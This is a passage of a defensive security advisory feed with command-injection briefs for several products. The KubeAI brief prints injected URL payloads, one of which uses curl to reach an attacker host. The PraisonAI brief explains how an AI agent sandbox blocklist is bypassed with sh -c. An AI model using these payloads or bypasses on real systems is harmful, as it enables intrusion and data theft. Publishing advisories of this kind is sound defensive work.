within the network. While the exact number of affected organizations is unknown, any Budibase instance running a version prior to 3.33.4 is potentially vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately disable the bash automation step in production environments to prevent further exploitation.\u003c/li\u003e\n\u003cli\u003eUpgrade Budibase to version 3.33.4 or later, where this vulnerability is addressed.\u003c/li\u003e\n\u003cli\u003eImplement the command sanitization and validation techniques outlined in the provided example fix.\u003c/li\u003e\n\u003cli\u003eIf upgrading is not immediately feasible, implement a whitelist of allowed commands to restrict the functionality of the bash automation step.\u003c/li\u003e\n\u003cli\u003eEnable and review Budibase application logs for any unusual or suspicious command execution patterns (reference: Overview section).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T12:00:00Z","date_published":"2026-04-04T12:00:00Z","id":"/briefs/2026-04-budibase-cmd-injection/","summary":"A command injection vulnerability exists in Budibase's bash automation step due to insufficient sanitization, allowing attackers with automation modification access to inject arbitrary shell commands, leading to remote code execution.","title":"Budibase Command Injection Vulnerability in Bash Automation Step","url":"https://feed.craftedsignal.io/briefs/2026-04-budibase-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-5485"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5485","command injection","athena","odbc","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5485 is an OS command injection vulnerability affecting the Amazon Athena ODBC driver before version 2.0.5.1 on Linux systems. The vulnerability resides in the browser-based authentication component of the driver. A local attacker can exploit this flaw by crafting malicious connection parameters that are then processed by the driver during a locally initiated connection attempt. Successful exploitation allows the attacker to execute arbitrary commands on the underlying system with the privileges of the user running the ODBC driver. This poses a significant risk to systems using vulnerable versions of the driver. The vulnerability was published on April 3, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains local access to a Linux system with the vulnerable Amazon Athena ODBC driver installed (version before 2.0.5.1).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts specially crafted connection parameters designed to inject OS commands. This could involve manipulating fields expected by the driver to trigger command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates a connection to Amazon Athena using the vulnerable ODBC driver and the crafted connection parameters.\u003c/li\u003e\n\u003cli\u003eThe ODBC driver attempts to authenticate using the browser-based authentication component, loading the malicious connection parameters.\u003c/li\u003e\n\u003cli\u003eDue to the vulnerability, the crafted parameters are not properly sanitized, leading to OS command injection.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed on the system with the privileges of the user running the ODBC driver.\u003c/li\u003e\n\u003cli\u003eThe attacker can leverage the command execution to install malware, create new user accounts, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5485 allows an attacker to execute arbitrary commands on a vulnerable Linux system. The impact includes potential data theft, system compromise, and lateral movement within the network. Given the nature of command injection, the attacker has significant control over the compromised system, allowing for a wide range of malicious activities. Organizations using the affected Amazon Athena ODBC driver on Linux should prioritize patching to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Amazon Athena ODBC driver to version 2.0.5.1 or later on all Linux systems to remediate CVE-2026-5485.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events on Linux systems for unusual processes spawned by the ODBC driver using the Sigma rules provided below.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies on Linux systems to limit the ability of attackers to leverage local access to exploit the vulnerability.\u003c/li\u003e\n\u003cli\u003eEnable logging for ODBC driver activity and review logs for suspicious connection attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect potential exploitation attempts by monitoring for command line arguments indicative of command injection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T12:00:00Z","date_published":"2026-04-04T12:00:00Z","id":"/briefs/2026-04-athena-odbc-cmd-injection/","summary":"A critical OS command injection vulnerability (CVE-2026-5485) in the Amazon Athena ODBC driver before 2.0.5.1 for Linux allows local attackers to execute arbitrary code via specially crafted connection parameters.","title":"Amazon Athena ODBC Driver OS Command Injection Vulnerability (CVE-2026-5485)","url":"https://feed.craftedsignal.io/briefs/2026-04-athena-odbc-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-35558"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command injection","cve-2026-35558","athena"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Amazon Athena ODBC driver versions prior to 2.1.0.0 are susceptible to a command injection vulnerability, identified as CVE-2026-35558. This flaw arises from the driver\u0026rsquo;s failure to properly neutralize special elements within connection parameters during the authentication process. A remote attacker could exploit this vulnerability by crafting malicious connection strings that, when processed by the vulnerable driver, allow for the execution of arbitrary code on the system or redirection of the authentication flow. The vulnerability was disclosed on April 3, 2026. Organizations utilizing the affected Amazon Athena ODBC driver versions on Windows, Linux, and macOS systems are at risk. Upgrade to version 2.1.0.0 to mitigate the risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a system using a vulnerable version of the Amazon Athena ODBC driver (prior to 2.1.0.0).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious ODBC connection string containing special characters or commands designed to be executed by the underlying operating system.\u003c/li\u003e\n\u003cli\u003eA user or application attempts to connect to Amazon Athena using the crafted connection string.\u003c/li\u003e\n\u003cli\u003eThe vulnerable Amazon Athena ODBC driver processes the connection string, failing to properly neutralize the special elements.\u003c/li\u003e\n\u003cli\u003eThe injected commands are executed by the operating system, potentially allowing the attacker to gain control of the system. This is due to the driver calling system functions to process the parameters without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe attacker could install malware, exfiltrate sensitive data, or pivot to other systems on the network.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker can redirect the authentication flow to a malicious server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the Athena database or the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-35558 allows an attacker to execute arbitrary code on the affected system with the privileges of the user running the application using the ODBC driver. This can lead to complete system compromise, including data theft, system corruption, or use of the compromised system as a foothold for further attacks within the organization\u0026rsquo;s network. While specific victim numbers are unknown, any system using a vulnerable version of the Amazon Athena ODBC driver is at risk. Sectors impacted depend on which organizations use Athena and the vulnerable ODBC driver.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade the Amazon Athena ODBC driver to version 2.1.0.0 or later on all affected systems (Windows, Linux, macOS) to remediate CVE-2026-35558, as recommended by Amazon in their security bulletin.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for all connection parameters passed to the Amazon Athena ODBC driver to prevent exploitation of command injection vulnerabilities, mitigating the risk even if an older driver version is temporarily in use.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments and monitor for unusual processes spawned by the Athena ODBC driver executable (e.g., \u003ccode\u003eAmazonAthenaODBC.exe\u003c/code\u003e on Windows) to detect potential command injection attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T21:17:11Z","date_published":"2026-04-03T21:17:11Z","id":"/briefs/2026-04-athena-odbc-injection/","summary":"A command injection vulnerability (CVE-2026-35558) exists in the Amazon Athena ODBC driver before 2.1.0.0 due to improper neutralization of special elements in connection parameters, potentially leading to arbitrary code execution or authentication redirection.","title":"Amazon Athena ODBC Driver Command Injection Vulnerability (CVE-2026-35558)","url":"https://feed.craftedsignal.io/briefs/2026-04-athena-odbc-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.6,"id":"CVE-2026-5463"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","metasploit","pymetasploit3"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-5463, affects pymetasploit3 versions up to 1.0.6. This flaw allows an attacker to inject newline characters into module options like RHOSTS when using the \u003ccode\u003econsole.run_module_with_output()\u003c/code\u003e function. By exploiting this, attackers can break the intended command structure and inject malicious commands, causing the Metasploit console to execute unintended actions. Successful exploitation can lead to arbitrary command execution, potentially compromising the Metasploit session and the systems it interacts with. This vulnerability highlights the importance of careful input validation in security tools, as it can be leveraged to subvert their intended functionality. Defenders should be aware of the potential for unexpected behavior when using pymetasploit3 with untrusted input.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious input string containing newline characters (\u003ccode\u003e\\n\u003c/code\u003e) within a module option, such as the \u003ccode\u003eRHOSTS\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker supplies this malicious input to the \u003ccode\u003econsole.run_module_with_output()\u003c/code\u003e function in pymetasploit3.\u003c/li\u003e\n\u003cli\u003ePymetasploit3 fails to properly sanitize or validate the input, allowing the newline characters to pass through.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003erun_module_with_output()\u003c/code\u003e function processes the input, the newline characters are interpreted as command separators.\u003c/li\u003e\n\u003cli\u003eMetasploit console executes the injected commands alongside the intended module command, potentially leading to arbitrary command execution within the context of the Metasploit session.\u003c/li\u003e\n\u003cli\u003eAttacker gains control of the Metasploit session, allowing them to interact with target systems or pivot to other internal resources.\u003c/li\u003e\n\u003cli\u003eThe attacker can then execute further commands to install malware, exfiltrate data, or perform other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5463 allows an attacker to execute arbitrary commands within the context of the Metasploit console. This could lead to the complete compromise of systems targeted by the Metasploit framework, potentially impacting numerous systems within a network depending on the attacker\u0026rsquo;s objectives and the scope of the Metasploit session. If the attacker gains elevated privileges, the impact could include data breaches, system downtime, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade pymetasploit3 to a version beyond 1.0.6 to remediate CVE-2026-5463.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization on any user-supplied data used in conjunction with \u003ccode\u003econsole.run_module_with_output()\u003c/code\u003e to prevent command injection.\u003c/li\u003e\n\u003cli\u003eMonitor Metasploit console logs for unusual or unexpected commands being executed, as this could indicate exploitation attempts (enable enhanced logging if necessary to capture command details).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided to detect attempts to inject newline characters within arguments passed to modules via the \u003ccode\u003econsole.run_module_with_output()\u003c/code\u003e function.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T05:16:24Z","date_published":"2026-04-03T05:16:24Z","id":"/briefs/2026-04-pymetasploit3-cmd-injection/","summary":"A command injection vulnerability in pymetasploit3 versions up to 1.0.6 allows attackers to inject newline characters into module options, leading to arbitrary command execution within Metasploit sessions.","title":"Pymetasploit3 Command Injection Vulnerability (CVE-2026-5463)","url":"https://feed.craftedsignal.io/briefs/2026-04-pymetasploit3-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-34791"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","vulnerability"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eEndian Firewall version 3.3.25 and prior is susceptible to OS command injection. This vulnerability, identified as CVE-2026-34791, allows authenticated users to execute arbitrary operating system commands. The vulnerability exists due to insufficient validation of the DATE parameter in the \u003ccode\u003e/cgi-bin/logs_proxy.cgi\u003c/code\u003e script. The DATE parameter\u0026rsquo;s value is used to construct a file path that is subsequently passed to a Perl \u003ccode\u003eopen()\u003c/code\u003e call. Due to an incomplete regular expression validation, an attacker can inject malicious commands. Successful exploitation allows the attacker to gain complete control of the affected system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn authenticated user accesses the \u003ccode\u003e/cgi-bin/logs_proxy.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious \u003ccode\u003eDATE\u003c/code\u003e parameter containing OS commands to be injected.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e/cgi-bin/logs_proxy.cgi\u003c/code\u003e script receives the \u003ccode\u003eDATE\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe script constructs a file path using the unvalidated \u003ccode\u003eDATE\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe script passes the crafted file path to a Perl \u003ccode\u003eopen()\u003c/code\u003e call.\u003c/li\u003e\n\u003cli\u003eThe Perl \u003ccode\u003eopen()\u003c/code\u003e function executes the injected OS commands due to the incomplete regular expression validation.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as installing malware, creating user accounts, or exfiltrating sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary OS commands on the affected Endian Firewall system. This can lead to complete system compromise, including data theft, service disruption, and the potential to use the compromised system as a launchpad for further attacks within the network. Given that firewalls are critical security components, a compromise could have severe consequences for the entire network infrastructure, leading to widespread data breaches and significant financial losses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or upgrade to a supported version of Endian Firewall that addresses CVE-2026-34791 (refer to Endian Firewall\u0026rsquo;s advisory).\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Suspicious Logs Proxy Date Parameter\u003c/code\u003e to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests to \u003ccode\u003e/cgi-bin/logs_proxy.cgi\u003c/code\u003e containing unusual characters or command-like syntax in the \u003ccode\u003eDATE\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eImplement strong input validation and sanitization for all user-supplied input to prevent command injection attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T15:16:42Z","date_published":"2026-04-02T15:16:42Z","id":"/briefs/2026-04-endian-firewall-rce/","summary":"Endian Firewall version 3.3.25 and prior allows authenticated users to execute arbitrary OS commands due to an OS command injection vulnerability in the DATE parameter of the /cgi-bin/logs_proxy.cgi endpoint.","title":"Endian Firewall Command Injection Vulnerability (CVE-2026-34791)","url":"https://feed.craftedsignal.io/briefs/2026-04-endian-firewall-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5333"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","web-application","cve-2026-5333"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 2, 2026, a command injection vulnerability, CVE-2026-5333, was disclosed in DefaultFuction Content-Management-System version 1.0. The vulnerability resides in the \u003ccode\u003e/admin/tools.php\u003c/code\u003e file and is triggered by manipulating the \u003ccode\u003ehost\u003c/code\u003e argument. This allows remote attackers to inject and execute arbitrary commands on the system. The existence of a public exploit increases the risk of exploitation, making it crucial for organizations using this CMS version to implement mitigation measures. The affected software has a limited user base, but successful exploitation can lead to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable DefaultFuction CMS 1.0 instance.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to \u003ccode\u003e/admin/tools.php\u003c/code\u003e, manipulating the \u003ccode\u003ehost\u003c/code\u003e parameter with an injected command.\u003c/li\u003e\n\u003cli\u003eThe application fails to properly sanitize or validate the \u003ccode\u003ehost\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed by the underlying operating system with the privileges of the web server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the server.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to escalate privileges using publicly available exploits or misconfigurations.\u003c/li\u003e\n\u003cli\u003eThe attacker installs a web shell or other persistent access mechanism.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance on the internal network and exfiltrates sensitive data or causes other damage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5333 allows a remote attacker to execute arbitrary commands on the affected server. This can lead to complete compromise of the system, including sensitive data theft, modification of website content, and potential lateral movement within the network. Given the publicly available exploit, the risk of widespread exploitation is significant for unpatched DefaultFuction CMS 1.0 instances.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available patches or updates for DefaultFuction Content-Management-System 1.0 to address CVE-2026-5333.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious HTTP Request to admin/tools.php\u003c/code\u003e to detect exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity, especially requests containing shell commands in the \u003ccode\u003ehost\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures to prevent command injection vulnerabilities in web applications.\u003c/li\u003e\n\u003cli\u003eRestrict access to the \u003ccode\u003e/admin/tools.php\u003c/code\u003e file to authorized users only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T14:16:36Z","date_published":"2026-04-02T14:16:36Z","id":"/briefs/2026-04-defaultfunction-cms-command-injection/","summary":"DefaultFuction Content-Management-System 1.0 is vulnerable to command injection via manipulation of the 'host' argument in the /admin/tools.php file, allowing remote attackers to execute arbitrary commands.","title":"DefaultFuction CMS 1.0 Command Injection Vulnerability (CVE-2026-5333)","url":"https://feed.craftedsignal.io/briefs/2026-04-defaultfunction-cms-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-33613"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-33613","rce","command-injection"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-33613 is a remote code execution (RCE) vulnerability affecting the \u003ccode\u003egenerateSrpArray\u003c/code\u003e function due to improper neutralization of special elements used in an OS command. Successful exploitation allows a remote attacker to achieve full system compromise. This vulnerability is triggered by writing arbitrary data to the user table, representing a significant security risk if combined with other vulnerabilities that enable such data manipulation. The vulnerability was published on April 2, 2026, and reported by CERT VDE. Defenders should prioritize investigating any suspicious activity related to user table modifications and monitor for unexpected command execution originating from the \u003ccode\u003egenerateSrpArray\u003c/code\u003e function. The CVSS v3.1 score is 7.2, indicating a high severity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access through an external vulnerability or compromised credentials.\u003c/li\u003e\n\u003cli\u003eAttacker leverages this access to inject arbitrary data into the user table.\u003c/li\u003e\n\u003cli\u003eThe system processes the malicious data in the user table through the \u003ccode\u003egenerateSrpArray\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to improper neutralization of special elements, the injected data is interpreted as an OS command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003egenerateSrpArray\u003c/code\u003e function executes the attacker-controlled OS command.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution with the privileges of the \u003ccode\u003egenerateSrpArray\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges to gain full system control.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious activities, such as data exfiltration, installing backdoors, or causing denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-33613 leads to complete system compromise, granting the attacker full control over the affected system. This can result in data breaches, service disruption, and significant financial losses. While the number of potential victims and targeted sectors are currently unknown, any system utilizing the vulnerable \u003ccode\u003egenerateSrpArray\u003c/code\u003e function is at risk. Given the high CVSS score (7.2), organizations should prioritize patching and mitigation efforts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unusual writes or modifications to the user table using file integrity monitoring or database auditing, to identify potential exploitation attempts (file_event, registry_set).\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for any data processed by the \u003ccode\u003egenerateSrpArray\u003c/code\u003e function to prevent OS command injection (webserver, linux/windows).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to detect potential exploitation attempts and post-exploitation activity (process_creation).\u003c/li\u003e\n\u003cli\u003eInvestigate any processes spawned by the \u003ccode\u003egenerateSrpArray\u003c/code\u003e function, especially those with unusual command-line arguments, using endpoint detection and response (EDR) solutions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T10:16:15Z","date_published":"2026-04-02T10:16:15Z","id":"/briefs/2026-04-cve-2026-33613/","summary":"CVE-2026-33613 describes a remote code execution (RCE) vulnerability due to improper neutralization of special elements used in an OS command in the generateSrpArray function, leading to full system compromise, but requires a separate method for writing arbitrary data to the user table.","title":"CVE-2026-33613: Remote Code Execution in generateSrpArray Function","url":"https://feed.craftedsignal.io/briefs/2026-04-cve-2026-33613/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["sandbox-escape","command-injection","praisonai"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI\u0026rsquo;s \u003ccode\u003eSubprocessSandbox\u003c/code\u003e, even in STRICT mode, is vulnerable to a sandbox escape. The vulnerability arises from the use of \u003ccode\u003esubprocess.run()\u003c/code\u003e with \u003ccode\u003eshell=True\u003c/code\u003e in \u003ccode\u003esandbox_executor.py\u003c/code\u003e, coupled with an insufficient blocklist that fails to include \u003ccode\u003esh\u003c/code\u003e and \u003ccode\u003ebash\u003c/code\u003e as standalone executables. This oversight allows attackers to bypass the intended command restrictions by executing arbitrary commands through \u003ccode\u003esh -c '\u0026lt;command\u0026gt;'\u003c/code\u003e.  Versions of PraisonAI up to 4.5.96 are affected. This means that any command blocked by the configured policy can be trivially executed, which could allow agent prompt injection attacks to lead to full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious command to be executed within the PraisonAI environment.\u003c/li\u003e\n\u003cli\u003eThe PraisonAI application receives the crafted command and attempts to execute it within the \u003ccode\u003eSubprocessSandbox\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eSubprocessSandbox\u003c/code\u003e uses \u003ccode\u003esubprocess.run()\u003c/code\u003e with \u003ccode\u003eshell=True\u003c/code\u003e to execute the provided command.\u003c/li\u003e\n\u003cli\u003eThe blocklist in \u003ccode\u003esandbox_executor.py\u003c/code\u003e fails to block the \u003ccode\u003esh\u003c/code\u003e or \u003ccode\u003ebash\u003c/code\u003e commands themselves.\u003c/li\u003e\n\u003cli\u003eThe attacker injects shell commands via \u003ccode\u003esh -c '\u0026lt;blocked_command\u0026gt;'\u003c/code\u003e, bypassing the string-pattern matching intended to restrict execution.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esh\u003c/code\u003e process executes the attacker\u0026rsquo;s command within the sandbox\u0026rsquo;s context, bypassing the intended security restrictions.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to resources such as network connections, the filesystem, or cloud metadata services.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges and potentially compromises the entire system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to bypass the intended security restrictions imposed by the PraisonAI \u003ccode\u003eSubprocessSandbox\u003c/code\u003e, even in its strictest configuration. This could lead to privilege escalation, unauthorized access to sensitive data, and the potential compromise of the entire system. Specifically, an attacker could leverage this escape to access network resources, manipulate the filesystem, or extract sensitive information from cloud metadata services. The lack of effective sandboxing could have severe consequences for environments relying on PraisonAI for secure execution of untrusted code.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the suggested fix of using \u003ccode\u003eshlex.split()\u003c/code\u003e and \u003ccode\u003eshell=False\u003c/code\u003e when calling \u003ccode\u003esubprocess.run()\u003c/code\u003e to prevent shell command injection (reference: suggested fix code block).\u003c/li\u003e\n\u003cli\u003eUpgrade PraisonAI to a version beyond 4.5.96 to incorporate the patch for CVE-2026-34955 (reference: CVE-2026-34955).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect the execution of \u003ccode\u003esh\u003c/code\u003e or \u003ccode\u003ebash\u003c/code\u003e with the \u003ccode\u003e-c\u003c/code\u003e option, which is indicative of attempts to bypass command restrictions (reference: Sigma rule \u0026ldquo;Detect sh/bash Command Execution with -c Option\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement a more comprehensive blocklist that includes \u003ccode\u003esh\u003c/code\u003e and \u003ccode\u003ebash\u003c/code\u003e as standalone executables in addition to dangerous patterns (reference: \u003ccode\u003esandbox_executor.py:179\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T23:26:01Z","date_published":"2026-04-01T23:26:01Z","id":"/briefs/2024-01-03-praisonai-sandbox-escape/","summary":"PraisonAI's SubprocessSandbox allows attackers to bypass command restrictions due to the use of `shell=True` in `subprocess.run()` combined with an insufficient blocklist that does not include `sh` or `bash`, enabling command execution via `sh -c '\u003ccommand\u003e'`.","title":"PraisonAI SubprocessSandbox Shell Escape via sh/bash","url":"https://feed.craftedsignal.io/briefs/2024-01-03-praisonai-sandbox-escape/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kubeai","command-injection","kubernetes","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eKubeAI versions 0.23.1 and earlier are vulnerable to an OS command injection flaw in the Ollama engine\u0026rsquo;s startup probe. The vulnerability stems from the \u003ccode\u003eollamaStartupProbeScript()\u003c/code\u003e function, which constructs a shell command using \u003ccode\u003efmt.Sprintf\u003c/code\u003e with unsanitized model URL components (\u003ccode\u003eref\u003c/code\u003e and \u003ccode\u003emodelParam\u003c/code\u003e). These components are extracted from the Model custom resource URL. An attacker who can create or update \u003ccode\u003eModel\u003c/code\u003e custom resources can inject arbitrary shell commands, which are then executed within the model server pods. This occurs because the extracted URL components are not sanitized before being interpolated into a shell command executed by \u003ccode\u003ebash -c\u003c/code\u003e. Successful exploitation allows attackers to compromise the model serving infrastructure and potentially access sensitive information or execute commands on the underlying host.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains the ability to create or update \u003ccode\u003eModel\u003c/code\u003e custom resources in a KubeAI environment. This could be through compromised credentials, misconfigured RBAC permissions, or other vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious \u003ccode\u003eModel\u003c/code\u003e custom resource with a specially crafted URL in the \u003ccode\u003espec.url\u003c/code\u003e field. The URL contains shell metacharacters and commands within the \u003ccode\u003eref\u003c/code\u003e component or the \u003ccode\u003emodel\u003c/code\u003e query parameter. For example, \u003ccode\u003eollama://registry.example.com/model;id\u0026gt;/tmp/pwned;echo\u003c/code\u003e or \u003ccode\u003epvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker applies the malicious \u003ccode\u003eModel\u003c/code\u003e resource to the Kubernetes cluster, triggering the KubeAI model controller.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eparseModelURL()\u003c/code\u003e function parses the malicious URL and extracts the unsanitized \u003ccode\u003eref\u003c/code\u003e and \u003ccode\u003emodelParam\u003c/code\u003e components.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eollamaStartupProbeScript()\u003c/code\u003e function constructs a shell command string using \u003ccode\u003efmt.Sprintf\u003c/code\u003e with the unsanitized \u003ccode\u003eref\u003c/code\u003e and \u003ccode\u003emodelParam\u003c/code\u003e components. The resulting command is intended to pull or copy the specified model.\u003c/li\u003e\n\u003cli\u003eThe KubeAI model controller creates a pod for the model server, configuring a startup probe that executes the crafted shell command via \u003ccode\u003ebash 